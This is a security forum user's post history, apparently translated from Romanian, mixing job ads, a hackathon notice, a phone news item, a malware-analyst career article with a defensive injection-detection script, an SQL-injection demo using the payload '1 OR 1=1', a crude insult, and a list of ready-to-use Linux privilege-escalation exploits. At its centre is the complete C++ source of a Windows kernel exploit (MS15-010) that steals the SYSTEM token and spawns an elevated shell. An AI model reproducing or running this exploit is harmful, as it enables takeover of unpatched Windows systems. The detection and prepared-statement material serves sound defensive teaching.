Everything posted by Nytro
-
@saber05 - One or two, it depends. @ManutaDeAur - Come work with us and let the company pay for it.
-
The ad is also on BestJobs if you don't want to send your CV by PM: IT Security Consultant (Penetration Tester) at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
-
Allview unveils the X2 Xtreme, its new flagship smartphone
Nytro posted a topic in Mobile security
Allview unveils the X2 Xtreme, its new flagship smartphone
Aurelian Mihai - 9 June 2015

The X2 Xtreme is a dual-SIM smartphone powered by the Helio X10 chipset (64-bit octa-core CPU at 2GHz), backed by 3GB of RAM. The device uses CorePilot 2.0 technology and runs Android 5.1 Lollipop. The centrepiece, however, is the 64GB of internal storage, which can be expanded up to 192GB by adding a microSD card of up to 128GB.

"We continue to offer consumers products adapted to ever more diverse demands and expectations, through constant innovation and research. We have also kept the tradition of bringing a smartphone with extreme performance to the Soul range, with an eye on the trends and the needs of users who want a smartphone with top-end specifications. Among these, worth noting are: the 24 MP main camera, which through an image-stacking algorithm can deliver an incredible resolution that we are keeping as a surprise until the first reviews appear; storage of up to 192 GB, which helps you capture video at 4K resolution; the 6" Quad HD display; the Helio X10 processor; and talk time of over 200 hours in Extreme mode," said Lucian Peticila, general manager of Visual Fan.

The top of the Soul range includes a fingerprint-based unlock system, offering a higher level of data protection. Besides unlocking the screen, the user can use the fingerprint to encrypt files.

The Allview X2 Xtreme offers two cameras, 8MP and 24MP, the main camera having a 6-layer lens (UV lens, focus lens, high precision lens, aperture, low dispersion lens) and scratch protection with a sapphire layer. Also notable is the dual-tone LED flash, "warm" and "cold", giving photos a natural look and a richer colour palette.

The phone can record 4K video and capture stills while filming using the button on the phone's frame. Alongside the camera, the headline specification is the 6" screen with QHD resolution (2560x1440). Users can choose any of the X2 Xtreme's themes, including the Chameleon function, which adapts the phone's interface by duplicating the colours around you. The smartphone is equipped with a 3500 mAh battery that promises up to 20 hours of continuous use or 350 hours on standby.

The Allview X2 Xtreme is available from today on pre-order, priced at 2199 LEI.

Source: Allview prezintă X2 Xtreme, noul său vârf de gamă smartphone
I think it's fine to fill in something random if you don't have one. I think they'll pick the people (the 50) based on LinkedIn and GitHub as well. I mean, if they're also interested in hiring, they'll want to pick "ok" people. Or at least end up with some contact details.
-
WHAT THE HACK?! 12 HOURS, 20 CHALLENGES, 2500 EURO IN PRIZES AND ONLY 50 PARTICIPANTS. WHEN: 21 June 2015, starting at 10am. WHERE: WELOVEDIGITAL, Bulevardul Dacia nr. 30, Mecano building. Places are limited. REGISTER NOW. Link: http://whatthehack.net/
-
The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio the development environment and Microsoft SQL Server the data storage engine.

Responsibilities:
- Building new systems with ASP.MVC, ASP.NET, SQL Server 2008/2012, EntityFramework and Linq
- Developing new functionality on our existing software products
- Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations
- Participating in a small, experienced, energetic development team.

Requirements:
- Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience
- Web development experience (ASP.MVC, ASP.NET, JavaScript, AJAX, CSS, JSON, jQuery) – minimum 4 years of experience
- Very good knowledge of T-SQL and relational database design – minimum 4 years of experience
- Graduate of Computer Science/Cybernetics/Information Technology/Electronics College
- Fluent in English
- Ability and willingness to work as part of a team of developers
- Learning oriented person.

Additional advantage:
- Active Reports, SQL Reporting Services
- Java & Install Shield knowledge
- Active Directory knowledge
- Knowledge of WCF Web Services, WCF Data Services

For more information or to apply, send me a PM.
-
Unfortunately remote work is not possible. I'm waiting for CVs from anyone interested. I guarantee you'll like the projects.
-
About how much a decent life costs in Bucharest
Nytro replied to clausasd's topic in Discutii non-IT
Find someone and share a two-room apartment. It would come to 150 euro per person for a decent apartment in a decent area. Maintenance fees and expenses would be split in two. You should manage.
About how much a decent life costs in Bucharest
Nytro replied to clausasd's topic in Discutii non-IT
Rent is the main cost, depending on the area and the number of rooms. Studios - 200-250 euro, two rooms - 250-350 euro. Compared to living with your parents there are also: maintenance fees, electricity, internet... If you live with someone, the costs are split. And food and drink, going out etc. depend on each person.
So You Want To Be A Malware Analyst
September 18, 2012 | BY Adam Kujawa

In war, there are always two sides: the attackers and the defenders. A less focused-on group is the researchers and developers. While soldiers are fighting a war on the front lines, scientists and engineers are researching and developing new weapons, defenses and tools: things that give their side an advantage. If one of these creations is ever captured by the opposing forces, it is reverse engineered to understand exactly how it works, how it can be defended against and even how to re-purpose it. The same goes for war on the cyber front: malicious attackers and system administrators (Black and White Hats) are the soldiers, malware authors develop new and dangerous forms of malware, and Malware Analysts reverse engineer these weapons to find out how to stop them.

What is a Malware Analyst?

A Malware Analyst is a highly specialized reverse-engineer, programmer and detective. They accomplish their task by using various tools and expert-level knowledge to understand not only what a particular piece of malware can do but also how it does it. Becoming a Malware Analyst requires a large amount of focus and discipline as well as training and practice in the inner workings of computer systems, programming methodologies in multiple languages and a keen mind for solving puzzles and connecting the dots.

You might consider becoming a Malware Analyst if you have a passion for computer security, enjoy solving puzzles and like the prospect of always learning new things. You might also enjoy it if you prefer a profession that always poses a challenge or if you look forward to working on new and interesting things. No day is ever the same as the previous; every day is an opportunity to learn something new and fine-tune your skills. In addition to the personal satisfaction you would get from being a Malware Analyst, you would also become a samurai in the fight to make the cyber world a safer place.

The type of person who would be perfect for becoming a Malware Analyst would be:
- A fast learner
- Able to derive meaning from nonsense
- A good puzzle solver
- Able to think outside of the box
- Willing to frequently use the scientific method
- Resourceful

Prerequisites

Prior to walking the path to become a Malware Analyst, a person should be familiar with:
- Operating System Concepts
- High Level & Low Level Programming (familiarity is fine, working knowledge not required at first)
- Fundamentals of networking
- How to use the internet to perform research

Building the basics

Being a Malware Analyst can take you many different places during your career and you can end up analyzing all types of malware, from normal application malware to exploits hidden in PDF files or malware found on smart phones. So where should you start when it comes to your training? You should master a few basics before trying anything too advanced:

Learn Assembly Language

In the hierarchy of programming languages, you have at the very top scripting languages like PERL or Python, followed by high and middle level languages like C++ and C, followed down by Assembly language, machine language and finally binary code, which is read by the hardware. Most malware is written in a middle-level language and once the code is completed, it is compiled all the way down so it can be read by the hardware and/or operating system. At this level, the code is not "human readable" or easily read by human eyes. In order for a Malware Analyst to be able to read the malware code, they will need to disassemble it. Unfortunately, the highest language derived from binary code is Assembly, which is the last level of human-readable code. Therefore, it is imperative that a would-be Malware Analyst also learn how to read and write Assembly code. Assembly language is low-level and therefore involves many more instructions than you would see in a higher-level program. For example, the code required to print something in the console in a higher-level language is usually just one line and sometimes just one symbol. In Assembly, this simple procedure may require anywhere from 5 to 20 lines of code.

Analyst's Tip: Learning Assembly is easy if you already know a higher-level language. Imagine what the operating system needs to do in order for a single function call to execute; this is what you will see in Assembly. By learning shortcuts to parsing Assembly, you will find what you are looking for much faster.

Learn how to use the tools

As a construction worker needs to know how to use a hammer and a mechanic needs to know how to use a wrench, a Malware Analyst needs to know how to work their own set of unique and powerful tools. Some tools are easy to use and some are not; some have clear output and some dump you with lots of data that you need to be able to parse. The tools of a Malware Analyst are incredibly important and usually one of the first things learned. Here is a list of the types of tools required and some examples of them:
- Disassembler – IDA Pro
- Debugger – OllyDbg, WinDbg
- System Monitor – Process Monitor, RegShot, Process Explorer
- Network Monitor – TCP View, Wireshark
- Packer Identifier – PEID
- Unpacking Tools – Qunpack, GUNPacker
- Binary Analysis Tools – PE Explorer, Malcode Analysts Pack
- Code Analysis Tools – LordPE, ImpRec

Once you learn how the tools work and what you can do with them, your quest in analyzing malware will become easier and easier. Also, keep in mind that while you might originally learn how to use a specific suite of tools, new tools are being developed all the time that might be more helpful in both their design and function.

Learn about malware

Learning about malware might seem a bit redundant when you are training to become a Malware Analyst; however, it is a very important aspect of your training. Malware evolves and changes every year; it uses new methods to infect as well as operate and sometimes brings back old methods if they are applicable again. If you were writing a program to play Tic-Tac-Toe, you could try to write it from scratch, or you could see how other people have written it before and get an idea of what you need to do. The same applies to malware analysis: reading white papers and analysis reports about different types of malware will give you an idea of what you might be seeing while reversing. Process injection is a method that malware uses to hide its operations; it must go through a set of functions in order to perform this technique, and it is important that you be able to identify it happening in the code based upon prior experience and knowledge about how malware works. Research, practice, knowledge and experience are key to being able to effectively analyze new malware and should be the staples of your Malware Analyst training.

Helpful Links and Sources

There are many different ways to learn about becoming a Malware Analyst; some people choose to go through courses taught online or in person, which can cost upwards of a few thousand dollars. Other people choose to learn as they go, picking up information where they can and learning from their own experience. Both are decent ways of learning about malware analysis, but the cheap and easy way would be through doing online research and reading lots of books. Here is a list of my favorite sources for learning about malware analysis:

Online Sources:
- Tuts4You.com Tutorials
- Sans.org and anything by Lenny Zeltser
- Google Searches for "Malware Analysis <specific topic>"

Books:
- Malware Analyst's Cookbook
- Rootkits: Subverting the Windows Kernel
- Practical Malware Analysis
- The IDA Pro Book
- Reversing: Secrets of Reverse Engineering

Conclusion

Whether it is to start a new career or just simple curiosity, learning about Malware Analysis can be a very challenging and rewarding path. It can test your patience, concentration and sometimes even your temper, but the payoff when you have been working on a file for hours and finally come across the key function or piece of data you were looking for cannot be duplicated by anything else. The future holds a war between those who use malware and those who fight against it, and as technology advances, so too do the methods in which malware authors write programs to exploit and control it. The next generation of malware fighters will require a more advanced knowledge than ever before; they will be the cyber samurai.

Source: https://blog.malwarebytes.org/intelligence/2012/09/so-you-want-to-be-a-malware-analyst/
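The article says an analyst should recognise process injection from the set of functions it must call. The following added example (not from the Malwarebytes post) scores a binary's import list against constructed groupings of the well-known injection API chains, the way you would triage an import table pulled from a disassembler; the technique names and API groupings are an illustrative reference set, not a complete catalogue.

```python
from typing import Dict, Iterable, List, Set, Tuple

# API groups that, taken together, implement one injection technique.
# Constructed for this example; names are compared after folding
# A/W suffixes and Nt/Zw prefixes (see canonical()).
INJECTION_PATTERNS: Dict[str, Set[str]] = {
    "remote thread injection": {
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    },
    "APC injection": {
        "OpenProcess", "OpenThread", "VirtualAllocEx", "WriteProcessMemory", "QueueUserAPC",
    },
    "thread context hijacking": {
        "OpenThread", "SuspendThread", "GetThreadContext", "SetThreadContext", "ResumeThread",
    },
    "process hollowing": {
        "CreateProcess", "UnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
        "SetThreadContext", "ResumeThread",
    },
}


def canonical(name: str) -> str:
    """Fold common name variants so the pattern table stays short:
    CreateProcessW -> CreateProcess, ZwUnmapViewOfSection -> UnmapViewOfSection.
    The Ex suffix is deliberately kept: VirtualAllocEx (remote) and
    VirtualAlloc (local) are different signals."""
    for prefix in ("Nt", "Zw"):
        if name.startswith(prefix) and len(name) > 2 and name[2].isupper():
            name = name[2:]
            break
    if len(name) > 1 and name[-1] in "AW" and name[-2].islower():
        name = name[:-1]
    return name


def score_imports(imports: Iterable[str]) -> Dict[str, Tuple[float, List[str]]]:
    """For every technique return (coverage, matched APIs), where coverage is
    the fraction of that technique's API set present in the import list."""
    seen = {canonical(n) for n in imports}
    result: Dict[str, Tuple[float, List[str]]] = {}
    for technique, apis in INJECTION_PATTERNS.items():
        matched = sorted(apis & seen)
        result[technique] = (len(matched) / len(apis), matched)
    return result


def flag_injection(imports: Iterable[str], threshold: float = 0.75) -> List[str]:
    """Techniques whose API chain is at least `threshold` covered, most
    complete first. A partial chain is worth a look but not a verdict, hence
    the threshold rather than an any-match rule."""
    scores = score_imports(imports)
    hits = [(cov, t) for t, (cov, _) in scores.items() if cov >= threshold]
    return [t for cov, t in sorted(hits, key=lambda x: (-x[0], x[1]))]


# Constructed sample import tables (not taken from any real sample).
SUSPECT_IMPORTS = [
    "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    "GetProcAddress", "LoadLibraryA", "CreateToolhelp32Snapshot", "Process32FirstW",
]
HOLLOWING_IMPORTS = [
    "CreateProcessA", "ZwUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
    "GetThreadContext", "SetThreadContext", "ResumeThread",
]
BENIGN_IMPORTS = [
    "CreateFileW", "ReadFile", "WriteFile", "CloseHandle", "GetProcAddress",
    "LoadLibraryW", "VirtualAlloc", "MessageBoxW",
]

if __name__ == "__main__":
    for label, imports in (("suspect", SUSPECT_IMPORTS),
                           ("hollowing", HOLLOWING_IMPORTS),
                           ("benign", BENIGN_IMPORTS)):
        print(f"{label:9}: {flag_injection(imports) or 'no injection chain found'}")
```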
-
IT Security Consultant (Penetration Tester/ Ethical Hacker)

Job profile:
Conducting technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits. Identifying and exploiting technical vulnerabilities in clients' systems, assessing the business risks of the technical vulnerabilities and communicating these to the client. Performing security configuration analysis for various operating systems, especially Windows and Linux / UNIX. The successful candidate will have the ability to learn quickly and work with new technologies, tools and techniques.

Some typical projects that you will work on (depending on your expertise) could be:
- Web application penetration testing: trying to find vulnerabilities in web applications (e.g. Internet Banking, eCommerce websites, web portals, etc.) and reporting them to clients. Trying to exploit these vulnerabilities to assess their impact on the business.
- Internal network penetration testing: simulating a malicious person who already has access to the internal network of the customer (e.g. a visitor, consultant, etc.). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags.
- Mobile application penetration testing: trying to find vulnerabilities in mobile applications (Android, iOS, and Windows Phone) and suggesting corrective measures to improve their security.

You may also be involved in other types of technical project that will involve your imagination and out-of-the-box thinking, as well as giving demonstrations and presentations to clients. We encourage technical research and presentation of our results at local and international hacking conferences.

Specific requirements
Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. We expect you to be familiar with OWASP Top 10, the HTTP protocol, SSL, SQL, JavaScript, buffer overflows, TCP/IP, DNS, Wireshark, nmap, Linux shell commands, Kali and others. You must also be able to express your findings in very good technical and business English (oral and written).

Further requirements:
- Bachelor's degree in an IT related field.
- Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development.
- Ability to work effectively either individually or as a member of a multi-skilled team.
- Professional discipline, accuracy, reliability and excellent analytical skills.
- Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation.

Certifications such as OSCP, OSCE, CEH, LPT, CCNA, MCSE will be considered an advantage.

Our Offer
- A competitive salary and benefits package.
- The chance to develop a rewarding professional path and work on challenging assignments.
- Support for professional qualifications and personal development through a strong mentoring program.
- Work in a friendly team of security professionals who enjoy sharing their experience with colleagues.
- The opportunity to participate in a wide variety of technical projects and client environments.
- Flexible working program.

Note: If you are interested, send me your CV by PM.
-
Microsoft Windows - Local Privilege Escalation (MS15-010)

```cpp
// ex.cpp
/*
Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
CVE-2015-0003
March 2015 (Public Release: May 24, 2015)
Tested on:
x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
x64: Win 2k8 SP1 | Win 2k8 R2 SP1
Author: Skylake - skylake <at> mail <dot> com
*/

#include "ex.h"

_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;

// Current thread's win32k THREADINFO pointer, read from the TEB
DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
    LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
    return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
    LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
    return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}

// Scan a structure for a pointer-sized member equal to dwCurrentValue and overwrite it
BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
{
    DWORD_PTR dwIndex, dwMask;
#ifdef _M_X64
    dwMask = ~0xf;
#else
    dwMask = ~7;
#endif
    //
    dwCurrentValue &= dwMask;
    for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
    {
        if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
        {
            //
            pdwStructure[dwIndex] = dwNewValue;
            return TRUE;
        }
    }
    return FALSE;
}

// Pick the per-OS atom, locate the kernel image and resolve the two kernel exports
BOOL WINAPI Init()
{
    HMODULE hMod = NULL;
    PVOID Base = NULL;
    OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
    PSYSTEM_MODULE_INFORMATION pm = NULL;
    BOOL RetVal = FALSE;
    __try
    {
        if( !GetVersionEx( &ov ) ) __leave;
        if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
        {
            atom = 0xc039;
        }
        else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
        {
            atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
        }
        if( !atom ) __leave;
        _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
        if( !ZwQuerySystemInformation ) __leave;
        ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
        if( !ZwAllocateVirtualMemory ) __leave;
        ULONG len;
        LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
        if( !status ) __leave;
        pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
        if( !pm ) __leave;
        status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
        if( status ) __leave;
        CHAR szKrnl[MAX_PATH] = { 0 }, *t;
        for( ULONG i = 0; i < pm->Count; ++i )
        {
            if( strstr( pm->Module[i].ImageName, "exe" ) )
            {
                t = strstr( pm->Module[i].ImageName, "nt" );
                if( t )
                {
                    strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
                    Base = pm->Module[i].Base;
                    break;
                }
            }
        }
        hMod = LoadLibraryA( szKrnl );
        if( !hMod || !Base ) __leave;
        PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
        if( !PsLookupProcessByProcessId ) __leave;
        PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
        PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
        if( !PsReferencePrimaryToken ) __leave;
        PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
        Pid = GetCurrentProcessId();
        RetVal = TRUE;
    }
    __finally
    {
        if( pm ) LocalFree( pm );
        if( hMod ) FreeLibrary( hMod );
    }
    return RetVal;
}

// Runs in kernel mode: swap this process's primary token for the System (PID 4) token
LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
    LPVOID pCurProcess = NULL;
    LPVOID pSystemInfo = NULL;
    PACCESS_TOKEN systemToken;
    PACCESS_TOKEN targetToken;
    PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
    PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
    targetToken = PsReferencePrimaryToken( pCurProcess );
    systemToken = PsReferencePrimaryToken( pSystemInfo );
    //
    find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 );
    KrnlMode = TRUE;
    return 0;
}

VOID WINAPI leave()
{
    keybd_event( VK_ESCAPE, 0, 0, NULL );
    keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
    keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
}

LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
{
    if( bSpawned )
    {
        leave();
        ExitProcess( 0 );
    }
    switch( message )
    {
    case WM_CREATE:
        SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
        FlashWindow( hWnd, TRUE );
        keybd_event( VK_LWIN, 0, 0, NULL );
        break;
    case WM_CLOSE:
        DestroyWindow( hWnd );
        break;
    case WM_DESTROY:
        PostQuitMessage( 0 );
        break;
    case WM_TIMER:
        KillTimer( hWnd, ID_TIMER );
        leave();
        DestroyWindow( hWnd );
        break;
    default:
        return DefWindowProc( hWnd, message, wParam, lParam );
    }
    return 0;
}

int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow )
{
    WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
    HWND hWnd = NULL;
    MSG Msg = { 0 };
    SIZE_T size = 0x1000;
    LPVOID addr = ( LPVOID ) 1;
    if( !Init() ) return 1;
    // Map the null page so the fake structures below can live at low addresses
    if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
    {
        //
        return 1;
    }
    DWORD_PTR p = pti();
    if( !p ) return 1;
#ifdef _M_X64
    *( ( PDWORD_PTR ) 0x10 ) = p;
    *( ( LPBYTE ) 0x2a ) = 4;
    *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
    *( ( PDWORD_PTR ) 0xa8 ) = 0x400;
    *( ( LPDWORD ) 0x404 ) = 1;
    *( ( PDWORD_PTR ) 0x408 ) = 0x800;
    *( ( LPWORD ) 0x410 ) = atom;
    *( ( LPBYTE ) 0x412 ) = 1;
#else
    *( ( LPDWORD ) 0x08 ) = p;
    *( ( LPBYTE ) 0x16 ) = 4;
    *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
    *( ( LPDWORD ) 0x6c ) = 0x400;
    *( ( LPDWORD ) 0x404 ) = 1;
    *( ( LPDWORD ) 0x408 ) = 0x800;
    *( ( LPWORD ) 0x40c ) = atom;
    *( ( LPBYTE ) 0x40e ) = 1;
#endif
    wc.lpfnWndProc = WndProc;
    wc.hInstance = hInstance;
    wc.lpszClassName = TEXT( "Class" );
    if( !RegisterClassEx( &wc ) ) return 1;
    hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL );
    if( !hWnd ) return 1;
    ShowWindow( hWnd, SW_HIDE );
    UpdateWindow( hWnd );
    while( GetMessage( &Msg, NULL, 0, 0 ) )
    {
        if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
        {
            if( !KrnlMode )
            {
                Msg.hwnd = ( HWND ) NULL;
            }
            else
            {
                Msg.hwnd = hWnd;
                if( !bSpawned )
                {
                    ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
                    bSpawned = TRUE;
                }
            }
        }
        TranslateMessage( &Msg );
        DispatchMessage( &Msg );
    }
    return ( int ) Msg.wParam;
}
// EOF
```

```cpp
//ex.h
#pragma once
#include <windows.h>
#include <stdio.h>
#include <tchar.h>

typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect );
typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process );
typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process );

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation = 0,
    SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength );

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

#define ID_TIMER 0x1
#define WM_SYSTIMER 0x118
// EOF
```

Source: https://www.exploit-db.com/exploits/37098/
-
Too bad. There was a migration option from vBulletin.
-
Incomplete. $id = $_GET['id']; $id = mysql_real_escape_string($id); $query = "SELECT camp1,camp2 FROM tabel WHERE id=". $id; Vulnerable as hell. PS: There are prepared statements, aka the efficient way to protect yourself.
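The point of the post above, carried through in runnable form as an added example (not code from the post): escaping only neutralises quote characters, so an escaped value concatenated into an unquoted numeric comparison still reaches the parser as SQL, while a bound parameter never can. SQLite stands in for MySQL here, so `escape_like_mysql` is a constructed approximation of `mysql_real_escape_string`, and the table and rows are constructed.

```python
import sqlite3
from typing import List, Tuple

Row = Tuple[str, str]


def escape_like_mysql(value: str) -> str:
    """Constructed stand-in for mysql_real_escape_string: backslash-escapes
    quotes and backslashes. Note what it does NOT touch: spaces, operators
    and keywords. SQLite has no equivalent, which is why it is emulated."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def setup_db() -> sqlite3.Connection:
    """In-memory table shaped like the post's `tabel`, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tabel (id INTEGER PRIMARY KEY, camp1 TEXT, camp2 TEXT)")
    conn.executemany(
        "INSERT INTO tabel VALUES (?, ?, ?)",
        [(1, "ana", "public"), (2, "bogdan", "private"), (3, "carmen", "private")],
    )
    return conn


def lookup_escaped_concat(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """The post's snippet: escape, then concatenate into an UNQUOTED numeric
    comparison. Input without quote characters passes through untouched."""
    query = "SELECT camp1,camp2 FROM tabel WHERE id=" + escape_like_mysql(user_id)
    return conn.execute(query).fetchall()


def lookup_prepared(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """Prepared statement: the value is bound as data after the statement is
    parsed, so it cannot alter the query's structure. A non-numeric string
    simply matches no INTEGER id."""
    return conn.execute(
        "SELECT camp1,camp2 FROM tabel WHERE id=?", (user_id,)
    ).fetchall()


def lookup_validated(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """Belt and braces for numeric ids: reject anything that is not an
    integer before it gets near SQL, then still bind it as a parameter."""
    try:
        numeric_id = int(user_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT camp1,camp2 FROM tabel WHERE id=?", (numeric_id,)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    for attempt in ("2", "1 OR 1=1"):
        print("escaped concat:", repr(attempt), "->", lookup_escaped_concat(db, attempt))
        print("prepared      :", repr(attempt), "->", lookup_prepared(db, attempt))
```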
-
"pretty much everything taught in high school, up to 12th grade" - In high school you learn algorithmics, not C++. C++ is the one with classes, inheritance... Have you done any of that? "- How was your first interview (here, I don't mean strictly C++)?" - It was interesting. The next 10 made it seem boring. "- How should you prepare for an interview?" - It's more important to know what the company does, what kind of projects it has and a few details about it, than to memorize some technical questions. If they make networking software, there will be networking questions (aka sockets). "- What questions do they ask (I mean the complexity of the questions)?" - About the language and about algorithmics. Some simpler, some more complicated. Note that there are other posts that go into this in detail. "- As a programmer, how much does a degree still matter nowadays" - It matters. At university you are at least forced to learn certain things that you wouldn't learn on your own. And the chances of being called for an interview are much lower without a degree. Yes, it shouldn't be a core criterion in the selection process, but it is taken into account. You can do a distance-learning degree and be done with it. See also: - https://rstforums.com/forum/97721-pareri-interviu-bitdefender.rst?highlight=interviu - https://rstforums.com/forum/98082-pareri-interviu-web-developer-programator-php.rst?highlight=interviu - https://rstforums.com/forum/79626-interviu-de-angajare.rst?highlight=interviu
-
I know / have known people on the pentest team at EA and they are very good. Avoid pointless comments.
-
"Excellent verbal, written, and interpersonal skills and professionalism in dealing with all levels of management and staff" - Not for you.
-
Advanced Heap Overflow Exploitation
Nytro replied to NO-MERCY's topic in Reverse engineering & exploit development
Awesome. Too bad it is not for Windows (8-10) Heap Manager. https://media.blackhat.com/bh-us-12/Briefings/Valasek/BH_US_12_Valasek_Windows_8_Heap_Internals_Slides.pdf -
We fuck you, we fuck on your flag, we fuck Ponta. Suck it.
-
exploits

Exploits that are mostly ready to use. They either require no modification or have been modified and verified as functional. To check md5sum in linux, type md5sum -c md5sum.txt

Linux

| Where | Type           | Platform | Sploit               | Dir                     | Lang |
|-------|----------------|----------|----------------------|-------------------------|------|
| Both  | Exploit Finder | Linux    | n/a                  | /lin/suggest_exploit.pl | Perl |
| Both  | Priv Esc       | Linux    | Exim 4.69            | /lin/pe-exim4           | Perl |
| Local | Priv Esc       | Linux    | Kernel <= 2.6.36-rc8 | /lin/pe-kernel-rds      | C    |
